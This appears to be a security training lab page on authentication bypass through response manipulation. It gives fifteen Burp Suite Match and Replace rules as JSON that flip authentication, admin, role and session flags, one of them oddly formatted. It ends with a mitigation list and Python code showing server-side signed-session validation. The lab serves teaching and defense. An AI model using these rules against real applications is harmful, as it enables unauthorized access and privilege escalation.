Lab 5: Authentication Bypass

Authentication bypass via response manipulation vulnerabilities

Difficulty: Low

Lab Overview

This lab demonstrates authentication bypass vulnerabilities where attackers can use Burp Suite to modify authentication responses and bypass login controls.

Objective: Understand how authentication bypass attacks work and how to exploit them using Burp Suite.

Authentication System
User Login

Test authentication with response manipulation:


Session Check

Check session validity:


Permission Check

Check user permissions:

Authentication Bypass Tester
⚠️ Authentication Bypass Warning

This lab demonstrates authentication bypass vulnerabilities:

  • Login Bypass - Bypass login authentication
  • Session Bypass - Bypass session validation
  • Permission Bypass - Bypass permission checks
  • Admin Escalation - Escalate to admin privileges
Burp Suite Rules

Use these Burp Suite Match and Replace rules:

  • "authenticated":false → "authenticated":true
  • "admin":false → "admin":true
  • "status":"failed" → "status":"success"
  • "permitted":false → "permitted":true
Vulnerability Details
  • Type: Authentication Bypass
  • Severity: High
  • Method: Burp Suite Match and Replace
  • Issue: Client-side trust of authentication responses
Attack Vectors
  • Login Bypass: Bypass login authentication
  • Session Bypass: Bypass session validation
  • Permission Bypass: Bypass permission checks
  • Admin Escalation: Escalate to admin privileges
Authentication Bypass Examples

Use these Burp Suite Match and Replace rules to exploit authentication bypass vulnerabilities:

1. Login Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"authenticated\":false", "string_replace": "\"authenticated\":true" }
This rule bypasses login authentication. Example: "authenticated":false becomes "authenticated":true.

2. Admin Escalation:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"admin\":false", "string_replace": "\"admin\":true" }
This rule escalates the user to admin. Example: "admin":false becomes "admin":true.

3. Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"failed\"", "string_replace": "\"status\":\"success\"" }
This rule bypasses status validation. Example: "status":"failed" becomes "status":"success".

4. Permission Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"permitted\":false", "string_replace": "\"permitted\":true" }
This rule bypasses permission checks. Example: "permitted":false becomes "permitted":true.

5. Session Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"valid\":false", "string_replace": "\"valid\":true" }
This rule bypasses session validation. Example: "valid":false becomes "valid":true.

6. User Type Escalation:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"user_type\":\"user\"", "string_replace": "\"user_type\":\"admin\"" }
This rule escalates the user type to admin. Example: "user_type":"user" becomes "user_type":"admin".

7. Session Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"expired\"", "string_replace": "\"status\":\"active\"" }
This rule bypasses session expiration. Example: "status":"expired" becomes "status":"active".

8. Access Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"denied\"", "string_replace": "\"status\":\"allowed\"" }
This rule bypasses access denial. Example: "status":"denied" becomes "status":"allowed".

9. Message Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"message\":\"Invalid credentials\"", "string_replace": "\"message\":\"Login successful\"" }
This rule changes error messages. Example: "Invalid credentials" becomes "Login successful".

10. Simple Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": true, "rule_type": "response_body", "string_match": "{\"status\":\"0\"}", "string_replace": "{\"status\":\"1\",\"user_type\":\"admin\"}" }
This rule bypasses a simple status flag. Example: {"status":"0"} becomes {"status":"1","user_type":"admin"}.

11. Header Manipulation:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": true, "rule_type": "request_header", "string_match": "{\"admin\", \"false\", admin_id \"0\"}", "string_replace": "{\"admin\", \"true\", admin_id \"1\"}" }
This rule manipulates request headers. Example: {"admin", "false", admin_id "0"} becomes {"admin", "true", admin_id "1"}.

12. Verification Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"verify\":false", "string_replace": "\"verify\":true" }
This rule bypasses verification checks. Example: "verify":false becomes "verify":true.

13. Email Verification Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"email_verified\":false", "string_replace": "\"email_verified\":true" }
This rule bypasses email verification. Example: "email_verified":false becomes "email_verified":true.

14. Account Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"account_active\":false", "string_replace": "\"account_active\":true" }
This rule bypasses account status checks. Example: "account_active":false becomes "account_active":true.

15. Role Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"role\":\"guest\"", "string_replace": "\"role\":\"admin\"" }
This rule bypasses role restrictions. Example: "role":"guest" becomes "role":"admin".
Real-World Attack Scenarios
Mitigation Strategies
  • Implement server-side authentication validation
  • Use response integrity checks and signatures
  • Implement proper session management
  • Use secure coding practices
  • Regular security testing and vulnerability assessments
  • Monitor for unusual authentication patterns
  • Implement proper input validation
  • Use multi-factor authentication
  • Implement proper error handling
  • Educate users about security threats
  • Use secure session tokens
  • Implement proper logging and monitoring
  • Use authentication bypass detection tools
  • Implement proper audit trails
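The flaw the lab's rules exploit (client-side trust of authentication responses) and the first two mitigations above (server-side authentication validation, integrity-protected session state) as one added Python example. This is not the lab's own code: it models the page's Match and Replace rules as literal substring replacement on a constructed failed-login response, shows a client that trusts the "authenticated" and "admin" flags in that body, and contrasts it with a server that decides authorization only from an HMAC-signed session token it issued itself, so that neither a rewritten response body nor a rewritten token claim changes the outcome. The function names (apply_match_replace, vulnerable_client_decides, issue_session, admin_endpoint), the sample response body and the signing key are all constructed for this example.

```python
import base64
import binascii
import hashlib
import hmac
import json
import secrets

# Constructed server-side secret; a real deployment loads it from a secret store.
SERVER_KEY = secrets.token_bytes(32)

# Two of the lab's Match and Replace rules, in the same field layout the page uses.
RULES = [
    {"rule_type": "response_body",
     "string_match": '"authenticated":false', "string_replace": '"authenticated":true'},
    {"rule_type": "response_body",
     "string_match": '"admin":false', "string_replace": '"admin":true'},
]

# Constructed server response to a FAILED login. Note that no session token is issued.
FAILED_LOGIN_BODY = '{"authenticated":false,"admin":false,"message":"Invalid credentials"}'


def apply_match_replace(body: str, rules=RULES) -> str:
    """Model what an intercepting proxy does with the lab's rules:
    literal substring replacement on the response body."""
    for rule in rules:
        if rule["rule_type"] == "response_body":
            body = body.replace(rule["string_match"], rule["string_replace"])
    return body


def vulnerable_client_decides(body: str) -> dict:
    """Vulnerable pattern: browser-side code trusts flags in the response body."""
    data = json.loads(body)
    return {"logged_in": bool(data.get("authenticated")),
            "show_admin_ui": bool(data.get("admin"))}


def _sign(claims: bytes) -> str:
    return hmac.new(SERVER_KEY, claims, hashlib.sha256).hexdigest()


def issue_session(user: str, is_admin: bool) -> str:
    """Server issues an HMAC-signed session token only after a successful login."""
    claims = json.dumps({"sub": user, "admin": is_admin}, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(claims).decode() + "." + _sign(claims)


def server_authorize(token):
    """Return verified claims, or None if the token is missing, malformed or tampered."""
    if not token or "." not in token:
        return None
    b64, sig = token.split(".", 1)
    try:
        claims = base64.urlsafe_b64decode(b64)
    except (ValueError, binascii.Error):
        return None
    # Constant-time comparison: a changed claim byte changes the MAC, so the token fails.
    if not hmac.compare_digest(_sign(claims), sig):
        return None
    try:
        return json.loads(claims)
    except ValueError:
        return None


def admin_endpoint(token) -> int:
    """Hardened pattern: authorization is decided here, from server-verified state,
    never from what the client says about itself. Returns an HTTP-style status code."""
    claims = server_authorize(token)
    if claims is None:
        return 401
    if not claims.get("admin"):
        return 403
    return 200


def tampered_admin_token(real_token: str) -> str:
    """The lab's flip applied to the token's claim while the old signature is kept;
    used below to show the integrity check rejecting it."""
    b64, sig = real_token.split(".", 1)
    claims = base64.urlsafe_b64decode(b64).replace(b'"admin":false', b'"admin":true')
    return base64.urlsafe_b64encode(claims).decode() + "." + sig


def demo() -> dict:
    rewritten = apply_match_replace(FAILED_LOGIN_BODY)
    user_token = issue_session("alice", False)
    return {
        "vulnerable_ui": vulnerable_client_decides(rewritten),  # admin UI shown
        "no_session": admin_endpoint(None),                     # 401: login never succeeded
        "user_session": admin_endpoint(user_token),             # 403: server knows the role
        "tampered": admin_endpoint(tampered_admin_token(user_token)),  # 401: MAC mismatch
        "admin_session": admin_endpoint(issue_session("ops-admin", True)),  # 200
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The rewritten body still drives the vulnerable client into showing the admin view, but every request to the protected endpoint is decided by server_authorize, which only accepts a token the server signed; the failed login produced no token, and flipping a claim inside a genuine token invalidates its MAC. Logging the 401/403 results from admin_endpoint also gives the "unusual authentication pattern" signal the mitigation list asks for.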